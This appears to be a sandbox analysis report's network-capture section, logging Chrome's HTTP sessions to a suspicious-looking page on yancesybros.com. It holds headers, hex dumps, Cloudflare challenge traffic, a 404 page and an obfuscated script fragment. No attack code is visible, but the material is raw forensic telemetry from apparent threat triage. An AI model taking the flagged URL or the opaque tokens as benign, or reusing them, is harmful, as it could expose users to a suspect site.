                                                    Data Ascii: c){ic=gF,clearTimeout(g3),eM[ic(1013)]=!![]},eM[gF(1384)]=![],eM[gF(710)]=function(ii){if(ii=gF,eM[ii(1384)])return;eM[ii(1384)]=!![]},g5=0,eN[gF(429)]===gF(1103)?eN[gF(623)](gF(1348),function(ip,c){ip=gF,c={'ccHpO':function(d,e,f){return d(e,f)}},c[ip(43


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.4497422.18.109.164443
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:43:51 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    Accept-Encoding: identity
                                                    User-Agent: Microsoft BITS/7.8
                                                    Host: fs.microsoft.com
                                                    2024-11-25 18:43:51 UTC478INHTTP/1.1 200 OK
                                                    Content-Type: application/octet-stream
                                                    Server: Kestrel
                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                    X-Ms-ApiVersion: Distribute 1.2
                                                    X-Ms-Region: prod-eus-z1
                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                    X-OSID: 2
                                                    X-CID: 2
                                                    X-CCC: GB
                                                    Cache-Control: public, max-age=53344
                                                    Date: Mon, 25 Nov 2024 18:43:51 GMT
                                                    Connection: close
                                                    X-CID: 2


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.44974335.190.80.14432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:43:52 UTC482OUTPOST /report/v4?s=3c6QTTvejV081hWYQg2nYd3f1J%2FkO%2F7al7UIK1r9Qa6a%2FYTKquwi7RMLTpYKTruLukdtPuMi4Fnq69aCqjwmEx98A%2FQcH75wH7Mupwi51mF5PLQ6bKl7EveK4k%2Fha03iwe8%3D HTTP/1.1
                                                    Host: a.nel.cloudflare.com
                                                    Connection: keep-alive
                                                    Content-Length: 401
                                                    Content-Type: application/reports+json
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:43:52 UTC401OUTData Raw: 5b 7b 22 61 67 65 22 3a 34 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 30 39 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 38 39 2e 37 34 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 79 61 6e 63 65 73 79 62 72 6f 73 2e 63 6f 6d
                                                    Data Ascii: [{"age":4,"body":{"elapsed_time":2091,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"172.67.189.74","status_code":403,"type":"http.error"},"type":"network-error","url":"https://yancesybros.com
                                                    2024-11-25 18:43:52 UTC168INHTTP/1.1 200 OK
                                                    Content-Length: 0
                                                    date: Mon, 25 Nov 2024 18:43:52 GMT
                                                    Via: 1.1 google
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.449744172.67.189.744432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:43:52 UTC873OUTGET /favicon.ico HTTP/1.1
                                                    Host: yancesybros.com
                                                    Connection: keep-alive
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-mobile: ?0
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    sec-ch-ua-arch: "x86"
                                                    sec-ch-ua-full-version: "117.0.5938.132"
                                                    sec-ch-ua-platform-version: "10.0.0"
                                                    sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                    sec-ch-ua-bitness: "64"
                                                    sec-ch-ua-model: ""
                                                    sec-ch-ua-platform: "Windows"
                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                    Sec-Fetch-Site: same-origin
                                                    Sec-Fetch-Mode: no-cors
                                                    Sec-Fetch-Dest: image
                                                    Referer: https://yancesybros.com/WHF9842BVD.html
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:43:53 UTC905INHTTP/1.1 404 Not Found
                                                    Date: Mon, 25 Nov 2024 18:43:53 GMT
                                                    Content-Type: text/html
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    x-powered-by: ASP.NET
                                                    x-powered-by-plesk: PleskWin
                                                    strict-transport-security: max-age=15768000; includeSubDomains
                                                    Cache-Control: max-age=14400
                                                    CF-Cache-Status: EXPIRED
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2BfIgxNoyxyiDOUKugheYkahpcvFehr32wAX%2FeL20Z4lRDQh0eXlcmW1yqQ3SKd17ATnFnv59Vp9uRcSug0U0WY9zd5boLiIHsHWA%2FGzxCi3%2BCrW1XkoMeq2jVOvpdL%2BfYs%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e83c970af5c0fa3-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1539&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4208&recv_bytes=1451&delivery_rate=183255&cwnd=238&unsent_bytes=0&cid=f000c4f032062086&ts=900&x=0"
                                                    2024-11-25 18:43:53 UTC464INData Raw: 33 31 32 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20
                                                    Data Ascii: 3123<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>404 Not Found</title>
                                                    2024-11-25 18:43:53 UTC1369INData Raw: 6c 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 72 65 6d 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 7d 61 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 32 34 39 38 65 33 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 61 3a 61 63 74 69 76 65 2c 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 23 31 38 38 64 64 39 3b 6f 75 74 6c 69 6e 65 3a 30 7d 68 31 2c 68 32 7b 6d 61 72 67 69 6e 3a 30 20 30 20 2e 35
                                                    Data Ascii: l{height:100%;min-height:100%}body{margin:0;font-size:1.3rem;background:#fff;color:#000}a{cursor:pointer;text-decoration:none;color:#2498e3;background-color:transparent}a:active,a:hover{text-decoration:underline;color:#188dd9;outline:0}h1,h2{margin:0 0 .5
                                                    2024-11-25 18:43:53 UTC1369INData Raw: 79 30 78 4c 6a 55 74 4d 31 59 79 4f 54 4d 75 4f 55 4d 78 4d 54 51 75 4e 79 41 79 4f 54 49 75 4d 69 41 78 4d 54 55 75 4e 43 41 79 4f 54 41 75 4f 53 41 78 4d 54 59 75 4d 69 41 79 4f 54 41 75 4f 58 6f 69 49 47 5a 70 62 47 77 39 49 69 4d 78 51 54 68 46 51 30 4d 69 4c 7a 34 38 63 47 46 30 61 43 42 6b 50 53 4a 4e 4d 6a 49 31 4c 6a 63 67 4e 6a 4d 35 4c 6a 56 4d 4d 6a 49 31 4c 6a 63 67 4e 6a 4d 35 4c 6a 56 6a 4d 43 41 78 4d 69 34 7a 4c 54 6b 75 4d 79 41 79 4d 69 34 79 4c 54 49 77 4c 6a 67 67 4d 6a 49 75 4d 6b 67 79 4d 79 34 35 59 79 30 78 4d 53 34 31 49 44 41 74 4d 6a 41 75 4f 43 30 35 4c 6a 6b 74 4d 6a 41 75 4f 43 30 79 4d 69 34 79 62 44 41 67 4d 43 49 67 5a 6d 6c 73 62 44 30 69 49 7a 4a 43 51 7a 46 47 52 69 49 76 50 6a 78 77 59 58 52 6f 49 47 51 39 49 6b 30 78
                                                    Data Ascii: y0xLjUtM1YyOTMuOUMxMTQuNyAyOTIuMiAxMTUuNCAyOTAuOSAxMTYuMiAyOTAuOXoiIGZpbGw9IiMxQThFQ0MiLz48cGF0aCBkPSJNMjI1LjcgNjM5LjVMMjI1LjcgNjM5LjVjMCAxMi4zLTkuMyAyMi4yLTIwLjggMjIuMkgyMy45Yy0xMS41IDAtMjAuOC05LjktMjAuOC0yMi4ybDAgMCIgZmlsbD0iIzJCQzFGRiIvPjxwYXRoIGQ9Ik0x
                                                    2024-11-25 18:43:53 UTC1369INData Raw: 34 32 64 6a 63 75 4e 45 67 7a 4c 6a 46 57 4e 44 49 30 4c 6a 46 36 49 69 42 6d 61 57 78 73 50 53 49 6a 4d 6a 41 35 4f 55 51 77 49 69 38 2b 50 48 42 68 64 47 67 67 5a 44 30 69 54 54 4d 75 4d 53 41 30 4d 6a 49 75 4d 57 67 79 4d 6a 49 75 4e 6e 59 33 4c 6a 52 49 4d 79 34 78 56 6a 51 79 4d 69 34 78 65 69 49 67 5a 6d 6c 73 62 44 30 69 49 7a 46 44 52 44 64 47 52 69 49 76 50 6a 78 77 59 58 52 6f 49 47 51 39 49 6b 30 78 4d 54 51 75 4e 79 41 30 4d 6a 51 75 4d 57 67 78 4d 54 46 32 4e 79 34 30 53 44 45 78 4e 43 34 33 56 6a 51 79 4e 43 34 78 65 69 49 67 5a 6d 6c 73 62 44 30 69 49 7a 45 34 4f 44 4a 43 52 69 49 76 50 6a 78 77 59 58 52 6f 49 47 51 39 49 6b 30 78 4d 54 51 75 4e 79 41 30 4d 6a 49 75 4d 57 67 78 4d 54 46 32 4e 79 34 30 53 44 45 78 4e 43 34 33 56 6a 51 79 4d
                                                    Data Ascii: 42djcuNEgzLjFWNDI0LjF6IiBmaWxsPSIjMjA5OUQwIi8+PHBhdGggZD0iTTMuMSA0MjIuMWgyMjIuNnY3LjRIMy4xVjQyMi4xeiIgZmlsbD0iIzFDRDdGRiIvPjxwYXRoIGQ9Ik0xMTQuNyA0MjQuMWgxMTF2Ny40SDExNC43VjQyNC4xeiIgZmlsbD0iIzE4ODJCRiIvPjxwYXRoIGQ9Ik0xMTQuNyA0MjIuMWgxMTF2Ny40SDExNC43VjQyM
                                                    2024-11-25 18:43:53 UTC1369INData Raw: 79 50 53 49 6a 51 54 56 46 4d 30 5a 46 49 69 38 2b 50 43 39 73 61 57 35 6c 59 58 4a 48 63 6d 46 6b 61 57 56 75 64 44 34 38 63 47 46 30 61 43 42 6b 50 53 4a 4e 4e 54 67 75 4e 53 41 78 4d 53 34 32 59 79 30 78 4e 43 34 30 49 44 6b 75 4e 53 30 7a 4d 43 34 35 49 44 49 33 4c 6a 63 74 4d 6a 51 75 4e 69 41 31 4f 53 34 34 51 7a 45 30 4c 6a 51 67 4e 7a 59 75 4f 43 41 77 49 44 6b 30 4c 6a 51 67 4d 43 41 78 4d 54 55 75 4e 6d 4d 77 49 44 49 31 4c 6a 4d 67 4d 6a 41 75 4d 79 41 30 4e 53 34 34 49 44 51 31 4c 6a 51 67 4e 44 55 75 4f 47 67 78 4d 7a 59 75 4f 47 4d 79 4e 53 34 78 49 44 41 67 4e 44 55 75 4e 43 30 79 4d 43 34 31 49 44 51 31 4c 6a 51 74 4e 44 55 75 4f 43 41 77 4c 54 49 77 4c 6a 6b 74 4d 54 49 75 4e 69 30 7a 4e 79 34 32 4c 54 4d 79 4c 6a 67 74 4e 44 4d 75 4f 53
                                                    Data Ascii: yPSIjQTVFM0ZFIi8+PC9saW5lYXJHcmFkaWVudD48cGF0aCBkPSJNNTguNSAxMS42Yy0xNC40IDkuNS0zMC45IDI3LjctMjQuNiA1OS44QzE0LjQgNzYuOCAwIDk0LjQgMCAxMTUuNmMwIDI1LjMgMjAuMyA0NS44IDQ1LjQgNDUuOGgxMzYuOGMyNS4xIDAgNDUuNC0yMC41IDQ1LjQtNDUuOCAwLTIwLjktMTIuNi0zNy42LTMyLjgtNDMuOS
                                                    2024-11-25 18:43:53 UTC1369INData Raw: 4c 6a 46 6a 4d 43 41 77 49 44 41 67 4d 43 41 77 49 44 41 67 4d 43 41 77 49 44 41 67 4d 43 41 77 49 44 42 32 4d 47 4d 78 4c 6a 59 74 4d 43 34 78 49 44 4d 75 4e 79 30 78 4c 6a 55 67 4d 79 34 33 4c 54 51 75 4d 79 41 77 4c 54 49 75 4e 79 30 79 4c 6a 67 74 4e 69 34 79 4c 54 4d 75 4e 79 30 33 4c 6a 4e 32 4c 54 41 75 4d 57 4d 77 49 44 41 67 4d 43 41 77 49 44 41 67 4d 43 34 78 49 44 41 67 4d 43 41 77 49 44 41 67 4d 43 30 77 4c 6a 46 32 4d 43 34 78 59 79 30 77 4c 6a 6b 67 4d 53 34 78 4c 54 4d 75 4e 69 41 30 4c 6a 59 74 4d 79 34 33 49 44 63 75 4d 79 41 74 4d 43 34 78 49 44 49 75 4e 79 41 79 4c 6a 45 67 4e 43 34 79 49 44 4d 75 4e 79 41 30 4c 6a 4e 57 4d 54 6b 33 4c 6a 46 36 54 54 59 31 4c 6a 59 67 4d 6a 41 32 4c 6a 64 6a 4d 43 41 77 49 44 41 67 4d 43 34 78 4c 54 41
                                                    Data Ascii: LjFjMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDB2MGMxLjYtMC4xIDMuNy0xLjUgMy43LTQuMyAwLTIuNy0yLjgtNi4yLTMuNy03LjN2LTAuMWMwIDAgMCAwIDAgMC4xIDAgMCAwIDAgMC0wLjF2MC4xYy0wLjkgMS4xLTMuNiA0LjYtMy43IDcuMyAtMC4xIDIuNyAyLjEgNC4yIDMuNyA0LjNWMTk3LjF6TTY1LjYgMjA2LjdjMCAwIDAgMC4xLTA
                                                    2024-11-25 18:43:53 UTC1369INData Raw: 44 41 67 4d 43 41 77 49 44 41 67 4d 43 41 77 4c 6a 45 67 4d 48 59 77 59 7a 49 75 4d 79 30 77 4c 6a 45 67 4e 53 34 30 4c 54 49 75 4d 69 41 31 4c 6a 4d 74 4e 69 34 78 49 43 30 77 4c 6a 45 74 4d 79 34 35 4c 54 51 74 4f 43 34 35 4c 54 55 75 4d 79 30 78 4d 43 34 31 56 6a 49 30 4d 43 34 30 65 6b 30 7a 4f 53 34 79 49 44 49 77 4f 43 34 31 59 7a 41 67 4d 43 41 77 49 44 41 75 4d 53 30 77 4c 6a 45 67 4d 43 34 78 49 44 41 67 4d 43 41 77 4c 54 41 75 4d 53 30 77 4c 6a 45 74 4d 43 34 78 64 6a 41 75 4d 6d 4d 74 4d 53 34 7a 49 44 45 75 4e 69 30 31 4c 6a 4d 67 4e 69 34 32 4c 54 55 75 4d 79 41 78 4d 43 34 31 49 43 30 77 4c 6a 45 67 4e 43 41 7a 49 44 59 75 4d 53 41 31 4c 6a 4d 67 4e 69 34 78 64 6a 42 6a 4d 43 41 77 49 44 41 67 4d 43 41 77 4c 6a 45 67 4d 43 41 77 49 44 41 67
                                                    Data Ascii: DAgMCAwIDAgMCAwLjEgMHYwYzIuMy0wLjEgNS40LTIuMiA1LjMtNi4xIC0wLjEtMy45LTQtOC45LTUuMy0xMC41VjI0MC40ek0zOS4yIDIwOC41YzAgMCAwIDAuMS0wLjEgMC4xIDAgMCAwLTAuMS0wLjEtMC4xdjAuMmMtMS4zIDEuNi01LjMgNi42LTUuMyAxMC41IC0wLjEgNCAzIDYuMSA1LjMgNi4xdjBjMCAwIDAgMCAwLjEgMCAwIDAg
                                                    2024-11-25 18:43:53 UTC1369INData Raw: 4d 74 4d 43 34 35 49 44 45 75 4d 69 30 7a 4c 6a 67 67 4e 43 34 35 4c 54 4d 75 4f 53 41 33 4c 6a 63 67 4c 54 41 75 4d 53 41 79 4c 6a 6b 67 4d 69 34 79 49 44 51 75 4e 53 41 7a 4c 6a 6b 67 4e 43 34 31 64 6a 42 6a 4d 43 41 77 49 44 41 67 4d 43 41 77 49 44 41 67 4d 43 41 77 49 44 41 67 4d 43 41 77 49 44 42 32 4d 47 4d 78 4c 6a 63 74 4d 43 34 78 49 44 4d 75 4f 53 30 78 4c 6a 59 67 4d 79 34 34 4c 54 51 75 4e 53 41 74 4d 43 34 78 4c 54 49 75 4f 53 30 79 4c 6a 6b 74 4e 69 34 31 4c 54 4d 75 4f 43 30 33 4c 6a 64 57 4d 54 67 34 4c 6a 4a 36 54 54 51 34 4c 6a 55 67 4d 6a 4d 33 4c 6a 68 6a 4d 43 41 77 49 44 41 67 4d 43 41 77 49 44 41 75 4d 53 41 77 49 44 41 67 4d 43 41 77 49 44 41 74 4d 43 34 78 64 6a 41 75 4d 57 4d 74 4d 43 34 35 49 44 45 75 4d 69 30 7a 4c 6a 67 67 4e
                                                    Data Ascii: MtMC45IDEuMi0zLjggNC45LTMuOSA3LjcgLTAuMSAyLjkgMi4yIDQuNSAzLjkgNC41djBjMCAwIDAgMCAwIDAgMCAwIDAgMCAwIDB2MGMxLjctMC4xIDMuOS0xLjYgMy44LTQuNSAtMC4xLTIuOS0yLjktNi41LTMuOC03LjdWMTg4LjJ6TTQ4LjUgMjM3LjhjMCAwIDAgMCAwIDAuMSAwIDAgMCAwIDAtMC4xdjAuMWMtMC45IDEuMi0zLjggN
                                                    2024-11-25 18:43:53 UTC1369INData Raw: 79 4d 6a 4d 75 4e 33 70 4e 4d 6a 67 75 4d 79 41 79 4e 44 59 75 4f 47 4d 77 49 44 41 67 4d 43 41 77 49 44 41 67 4d 43 34 78 49 44 41 67 4d 43 41 77 49 44 41 67 4d 43 30 77 4c 6a 46 32 4d 43 34 78 59 79 30 77 4c 6a 6b 67 4d 53 34 79 4c 54 4d 75 4f 43 41 30 4c 6a 6b 74 4d 79 34 35 49 44 63 75 4e 79 41 74 4d 43 34 78 49 44 49 75 4f 53 41 79 4c 6a 49 67 4e 43 34 31 49 44 4d 75 4f 53 41 30 4c 6a 56 32 4d 47 4d 77 49 44 41 67 4d 43 41 77 49 44 41 67 4d 48 4d 77 49 44 41 67 4d 43 41 77 64 6a 42 6a 4d 53 34 33 4c 54 41 75 4d 53 41 7a 4c 6a 6b 74 4d 53 34 32 49 44 4d 75 4f 43 30 30 4c 6a 55 67 4c 54 41 75 4d 53 30 79 4c 6a 6b 74 4d 69 34 35 4c 54 59 75 4e 53 30 7a 4c 6a 67 74 4e 79 34 33 56 6a 49 30 4e 69 34 34 65 6b 30 32 4d 53 41 79 4e 6a 49 75 4e 32 4d 77 49 44
                                                    Data Ascii: yMjMuN3pNMjguMyAyNDYuOGMwIDAgMCAwIDAgMC4xIDAgMCAwIDAgMC0wLjF2MC4xYy0wLjkgMS4yLTMuOCA0LjktMy45IDcuNyAtMC4xIDIuOSAyLjIgNC41IDMuOSA0LjV2MGMwIDAgMCAwIDAgMHMwIDAgMCAwdjBjMS43LTAuMSAzLjktMS42IDMuOC00LjUgLTAuMS0yLjktMi45LTYuNS0zLjgtNy43VjI0Ni44ek02MSAyNjIuN2MwID
                                                    2024-11-25 18:43:53 UTC1171INData Raw: 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 32 35 73 20 65 61 73 65 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 32 35 73 20 65 61 73 65 7d 2e 68 65 6c 70 2d 61 63 74 69 6f 6e 73 20 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 32 33 61 37 64 65 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 40 6d 65 64 69 61 28 6d 61 78 2d 77 69 64 74 68 3a 39 35 39 70 78 29 7b 2e 70 61 67 65 3a 62 65 66 6f 72 65 7b 2d 6d 73 2d 66 6c 65 78 2d 70 72 65 66 65 72 72 65 64 2d 73 69 7a 65 3a 34 30 30 70 78 3b 66 6c 65 78 2d 62 61 73 69 73 3a 34 30 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 35 30 25 20 34 72 65 6d 7d 2e 6d 61 69 6e 7b 70 61 64 64 69 6e 67 3a 35 72 65 6d 7d 7d 40 6d 65 64 69
                                                    Data Ascii: t-transition:.25s ease;transition:.25s ease}.help-actions a:hover{text-decoration:none;background:#23a7de;color:#fff}@media(max-width:959px){.page:before{-ms-flex-preferred-size:400px;flex-basis:400px;background-position:50% 4rem}.main{padding:5rem}}@medi


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.449745172.67.189.744432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:43:52 UTC1319OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/121176288:1732559265:7lJ7n7BdOJx3cf64Km5o6XhhTjh1yazfNFmmaS1TOb0/8e83c9569b4eefa7/NVxlqQ0CuOO_mq_ADX6BzRNv15dryg_MCjBHsRZiF_M-1732560228-1.2.1.1-BSHpMKKlNjDcEJtMM5Iqnf.JCyWX7aLd0e6uY.qTM_J3gynsL2deklactUUpBCnz HTTP/1.1
                                                    Host: yancesybros.com
                                                    Connection: keep-alive
                                                    Content-Length: 4262
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-mobile: ?0
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    sec-ch-ua-arch: "x86"
                                                    Content-type: application/x-www-form-urlencoded
                                                    sec-ch-ua-full-version: "117.0.5938.132"
                                                    sec-ch-ua-platform-version: "10.0.0"
                                                    CF-Chl-RetryAttempt: 0
                                                    sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                    sec-ch-ua-bitness: "64"
                                                    sec-ch-ua-model: ""
                                                    CF-Challenge: NVxlqQ0CuOO_mq_ADX6BzRNv15dryg_MCjBHsRZiF_M-1732560228-1.2.1.1-BSHpMKKlNjDcEJtMM5Iqnf.JCyWX7aLd0e6uY.qTM_J3gynsL2deklactUUpBCnz
                                                    sec-ch-ua-platform: "Windows"
                                                    Accept: */*
                                                    Origin: https://yancesybros.com
                                                    Sec-Fetch-Site: same-origin
                                                    Sec-Fetch-Mode: cors
                                                    Sec-Fetch-Dest: empty
                                                    Referer: https://yancesybros.com/WHF9842BVD.html
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:43:52 UTC4262OUTData Raw: 76 5f 38 65 38 33 63 39 35 36 39 62 34 65 65 66 61 37 3d 77 4e 76 31 6e 31 25 32 62 48 47 4a 4d 4f 76 73 4e 45 36 4f 73 6c 30 2d 38 4d 56 30 42 31 4b 5a 30 4d 68 45 30 5a 30 61 51 4b 4f 4d 6f 30 6b 59 6b 30 6c 57 79 45 4d 33 30 4a 50 7a 79 57 45 30 52 79 30 54 30 64 68 4d 2d 30 36 61 71 7a 55 4b 30 4d 4b 30 63 48 51 47 64 30 61 59 45 53 6e 30 64 31 73 39 30 38 59 49 2d 44 6d 48 31 30 54 24 77 57 31 4b 50 30 36 31 33 39 76 52 76 4e 31 30 4f 34 5a 53 68 78 7a 6c 78 6c 24 7a 74 57 30 49 31 73 7a 65 6c 57 31 30 36 57 30 62 31 4d 46 53 31 54 76 77 30 47 4f 47 4b 70 6e 4f 47 5a 46 4a 31 2d 4b 53 24 46 68 59 63 33 31 75 30 51 46 30 4d 4e 30 4b 24 57 30 4e 4c 4b 30 46 42 42 4f 68 63 30 30 73 31 47 34 30 66 5a 6d 30 36 4e 30 45 68 70 71 30 2b 70 48 72 68 4e 30 47
                                                    Data Ascii: v_8e83c9569b4eefa7=wNv1n1%2bHGJMOvsNE6Osl0-8MV0B1KZ0MhE0Z0aQKOMo0kYk0lWyEM30JPzyWE0Ry0T0dhM-06aqzUK0MK0cHQGd0aYESn0d1s908YI-DmH10T$wW1KP06139vRvN10O4ZShxzlxl$ztW0I1szelW106W0b1MFS1Tvw0GOGKpnOGZFJ1-KS$FhYc31u0QF0MN0K$W0NLK0FBBOhc00s1G40fZm06N0Ehpq0+pHrhN0G
                                                    2024-11-25 18:43:53 UTC850INHTTP/1.1 200 OK
                                                    Date: Mon, 25 Nov 2024 18:43:53 GMT
                                                    Content-Type: text/plain; charset=UTF-8
                                                    Content-Length: 13584
                                                    Connection: close
                                                    cf-chl-gen: 0p+ADsavV5llmRldDXqoatf7KTHuvQqBvwYTf8EJ59Y2R0SmOFRhhEBomd6iJiyOfADSqVUIbDk=$xTUsQ7H4NjeZvHJX
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fq3j6G3q0tRC1o%2B4iUBnc7d80S1O6KbUfa4WvgZfYb0dDH45s3Sf%2BNn4MhNFI0G%2F0pWhFA9LF7kGI6jK%2B733%2BRr3TPaK7Y1PPzi%2Fa0H4KFh6S87L%2FtZ1zCxfs3pgRVOBJ6E%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e83c97028da182d-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1483&sent=7&recv=11&lost=0&retrans=1&sent_bytes=4212&recv_bytes=6203&delivery_rate=329868&cwnd=145&unsent_bytes=0&cid=493fa0d0408485e0&ts=503&x=0"
